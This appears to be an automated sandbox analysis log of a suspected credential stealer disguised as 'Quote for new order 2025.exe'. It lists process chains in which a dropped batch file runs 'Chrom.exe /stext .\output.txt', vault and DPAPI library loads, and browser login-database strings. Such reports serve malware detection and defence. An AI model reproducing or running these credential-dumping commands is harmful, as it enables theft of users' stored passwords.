                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: Chrom.exe, 00000004.00000002.1694040935.0000000000870000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819592441.00000000027D4000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1902157447.0000000002733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Quote for new order 2025.exe, 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Chrom.exe, Chrom.exe, 00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe, 0000000E.00000002.1901575324.000000000044F000.00000002.00000001.01000000.0000000C.sdmp, Chrom.exe.0.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: Quote for new order 2025.exeReversingLabs: Detection: 60%
                          Source: unknownProcess created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: unknownProcess created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: unknownProcess created: C:\Users\user\Desktop\Quote for new order 2025.exe "C:\Users\user\Desktop\Quote for new order 2025.exe"
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txtJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: msftedit.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.globalization.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: globinputhost.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: pstorec.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: msftedit.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.globalization.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: globinputhost.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: pstorec.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: msftedit.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.globalization.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: globinputhost.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: version.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wininet.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wldp.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: pstorec.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: vaultcli.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\Chrom.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeFile opened: C:\Users\user\Desktop\Chrom.cfgJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeFile opened: C:\Windows\SysWOW64\MsftEdit.DLLJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Quote for new order 2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Quote for new order 2025.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Quote for new order 2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: \obj\Debug\FoxmaiI.pdb source: Quote for new order 2025.exe
